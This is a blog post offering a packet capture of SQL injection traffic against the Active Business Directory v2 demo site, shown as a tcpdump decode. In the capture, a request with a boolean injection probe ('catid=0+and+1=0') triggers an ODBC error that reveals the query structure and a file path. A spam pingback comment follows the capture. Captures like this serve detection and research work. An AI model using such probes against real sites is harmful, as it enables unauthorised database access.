Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

By | January 29, 2016

Download Active Business DIrectory Remote Blind SQL Injection PCAP : remoteblindsql.pcap

 

 

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1:1421, ack 438, win 65098, length 1420: HTTP: HTTP/1.1 500 Internal Server Error
.. v…!E…JZ@.q.cm.j..u….P .f).tJ…P..J….HTTP/1.1 500 Internal Server Error
Date: Thu, 01 Jan 2009 14:36:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 4951
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD; path=/
Cache-control: private

Active Business Directory

 

208.106.128.136.80: Flags [.], ack 2841, win 65535, length 0 .. v.*.!E..(Wm@…L.u….j.. ..PJ…f*..P……. 2009-01-01 09:37:00.315557 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], ack 438, win 65098, length 0 .. v.,.!E..(K @.q.hI.j..u….P .f*..J…P..J…… 2009-01-01 09:37:00.960486 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 2841:4261, ack 438, win 65098, length 1420: HTTP .. v…!E…Ol@.q.^[.j..u….P .f*..J…P..Jk#..>

 

Tell a Friend
Make This Your Home Page
Book Mark

 

Page Views Visitors
Today 45 45
Jan 45 45
Total 34,232 32,098

 

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ‘Links.CategoryID=categories.CategoryID and Approved<>0 and Links.CategoryID in ()’.

/demoactivebusinessdirectory/includes/gentable.asp, line 40
2009-01-01 09:37:00.963903 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 5250, win 65535, length 0
.. v.*.!E..(W.@…L.u….j.. ..PJ…f*..P….i..
2009-01-01 09:37:00.984661 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 438:967, ack 5250, win 65535, length 529: HTTP: GET /demoactivebusinessdirectory/style.css HTTP/1.1
.. v.;.!E..9W.@…J.u….j.. ..PJ…f*..P…….GET /demoactivebusinessdirectory/style.css HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/css,*/*;q=0.1
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.activewebsoftwares.com/demoactivebusinessdirectory/default.asp?catid=0+and+1=0
Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD

2009-01-01 09:37:01.748226 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 5250:6670, ack 967, win 64569, length 1420: HTTP: HTTP/1.1 200 OK
.. v…!E…T.@.q.Y..j..u….P .f*..J…P..9….HTTP/1.1 200 OK
Content-Length: 4545
Content-Type: text/css
Last-Modified: Mon, 29 Jan 2007 15:53:53 GMT
Accept-Ranges: bytes
ETag: “80bec7acbd43c71:b1b”
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 01 Jan 2009 14:36:59 GMT
2009-01-01 09:37:01.754823 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 10079, win 65535, length 0
.. v.*.!E..(W.@…LWu….j.. ..PJ…f*!.P….{..
2009-01-01 09:37:01.767340 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 967:1505, ack 10079, win 65535, length 538: HTTP: GET /demoactivebusinessdirectory/images/background.gif HTTP/1.1
.. v.D.!E..BX.@…J.u….j.. ..PJ…f*!.P….E..GET /demoactivebusinessdirectory/images/background.gif HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.activewebsoftwares.com/demoactivebusinessdirectory/style.css
Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD

2009-01-01 09:37:01.929693 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], ack 967, win 64569, length 0
.. v.,.!E..(Ww@.q.[..j..u….P .f*!.J…P..9.A….
2009-01-01 09:37:02.523785 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [P.], seq 10079:10452, ack 1505, win 65535, length 373: HTTP: HTTP/1.1 200 OK
.. v…!E…\’@.q.U..j..u….P .f*!.J…P…5H..HTTP/1.1 200 OK
Content-Length: 90
Content-Type: image/gif
Last-Modified: Mon, 29 Jan 2007 15:53:53 GMT
Accept-Ranges: bytes
ETag: “80bec7acbd43c71:b1b”
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 01 Jan 2009 14:36:59 GMT

GIF89a ………….Hq9~.,…. …..3…&…………..H………..B..=…….
…….n..;
2009-01-01 09:37:02.706130 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 10452, win 65162, length 0

Share Button

One thought on “Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *